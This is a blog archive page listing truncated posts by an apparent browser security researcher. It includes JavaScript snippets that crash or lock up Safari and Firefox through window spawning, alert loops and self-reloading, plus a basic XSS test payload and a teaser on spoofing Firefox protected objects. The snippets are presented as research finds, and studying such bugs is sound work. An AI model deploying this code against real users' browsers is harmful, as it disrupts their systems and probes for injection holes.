Archives for the ‘browser hacking’ Category

Browser window spawning DOS

This causes DOS in the latest Safari and maybe other browsers too. I tried it in Opera and it does create loads of tabs but seems stable enough to close it down. Enjoy! 🙂 <script type="text/javascript"> window.onload = function() { setInterval(‘spawn()’,1); } function spawn() { frm = document.createElement(‘form’); = ‘x’ + Math.round(Math.random() * 100000); […]

WebFu crouching tab hidden dos

Hello my student here I’ll show you the way of the tiger, if a deadly Firefox ninja approaches your dojo with a XSS punch:- "><script>alert(/XSS PUNCH!/)</script> Then you can respond with the crouching tab hidden dos move:- self.location = “‘javascript:document.clear();;document.close();self.location=self.location’)”; This move can frustrate your opponent into submission.

Safari security

Well what do you do when you report a bug to Apple and the deny it is even a problem? Turn it into a remote one. What do you do when they don’t provide you with any credit whatsoever? Give up? Stop testing Safari? Or drink lots of coffee and red bull, stay up all […]

Firefox history DOS attack

Here’s a complete DOS attack on Firefox using the history object:- window.onload = function() { history.__defineGetter__(“x”, function() { for(i in this) { try { alert(this[i]); } catch(e) { } } }); history.x; } Tested on Firefox mac, a window pops up with two blank buttons and you are unable to do anything without using […]

Spoofing Firefox protected objects

I’ve been hacking Firefox in my spare time and I thought that it had adequate protection against spoofing properties like document.domain. I was wrong 🙂 This could turn into a browser exploit in future if the spoofed objects are accepted by Firefox internally (I don’t think they are, but you never know 😉 ). There […]